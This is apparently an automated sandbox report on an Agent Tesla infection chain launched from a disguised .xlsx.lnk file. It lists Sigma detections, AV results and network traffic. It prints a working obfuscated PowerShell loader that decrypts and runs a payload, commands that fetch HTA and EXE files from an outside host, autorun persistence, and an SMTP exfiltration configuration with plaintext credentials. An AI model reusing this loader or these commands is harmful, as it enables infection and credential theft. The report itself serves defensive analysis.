256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
                    Sigma detected: Suspicious Program Location with Network Connections
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 192.185.124.132, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\bwsiuvcU.pif, Initiated: true, ProcessId: 6340, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49721
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Ucvuiswb.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\uc.exe, ProcessId: 8080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ucvuiswb
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\bwsiuvcU.pif, CommandLine: C:\Users\Public\Libraries\bwsiuvcU.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\bwsiuvcU.pif, NewProcessName: C:\Users\Public\Libraries\bwsiuvcU.pif, OriginalFileName: C:\Users\Public\Libraries\bwsiuvcU.pif, ParentCommandLine: "C:\Users\user\AppData\Roaming\uc.exe" , ParentImage: C:\Users\user\AppData\Roaming\uc.exe, ParentProcessId: 8080, ParentProcessName: uc.exe, ProcessCommandLine: C:\Users\Public\Libraries\bwsiuvcU.pif, ProcessId: 6340, ProcessName: bwsiuvcU.pif
                    Sigma detected: Gzip Archive Decode Via PowerShell
                    Source: Process startedAuthor: Hieu Tran: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Roaming\uc.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.185.124.132, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\bwsiuvcU.pif, Initiated: true, ProcessId: 6340, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49721
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta, ProcessId: 5632, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7612, ProcessName: svchost.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: FT. 40FE CNY .xlsx.lnkAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                    Source: https://www.sessosesso.it/assets/aw/uc.exeAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: cmd.exe.5360.20.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.irmaklarpaslanmaz.com.trB", "Username": "muhasebe@irmaklarpaslanmaz.com.tr", "Password": "MH5473588PmZ&"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFReversingLabs: Detection: 58%
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFVirustotal: Detection: 38%Perma Link
                    Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 28%
                    Source: C:\Users\Public\Libraries\netutils.dllVirustotal: Detection: 47%Perma Link
                    Source: C:\Users\user\AppData\Roaming\uc.exeReversingLabs: Detection: 58%
                    Source: C:\Users\user\AppData\Roaming\uc.exeVirustotal: Detection: 38%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: FT. 40FE CNY .xlsx.lnkReversingLabs: Detection: 31%
                    Source: FT. 40FE CNY .xlsx.lnkVirustotal: Detection: 24%Perma Link
                    Machine Learning detection for dropped file
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\uc.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: FT. 40FE CNY .xlsx.lnkJoe Sandbox ML: detected

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack
                    Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2
                    Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
                    Source: Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
                    Source: Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
                    Source: Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
                    Source: Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,19_2_029858CC
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0299C8AC InternetCheckConnectionA,19_2_0299C8AC
                    Source: global trafficHTTP traffic detected: GET /assets/aw/Book1.xlsx HTTP/1.1Host: sessosesso.itConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /assets/aw/uc.exe HTTP/1.1Host: www.sessosesso.itConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: GET /assets/aw/yt.hta HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.sessosesso.itConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /assets/aw/yt.hta HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.sessosesso.itConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /assets/aw/Book1.xlsx HTTP/1.1Host: sessosesso.itConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /assets/aw/uc.exe HTTP/1.1Host: www.sessosesso.itConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                    Source: unknownDNS traffic detected: queries for: www.sessosesso.it
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
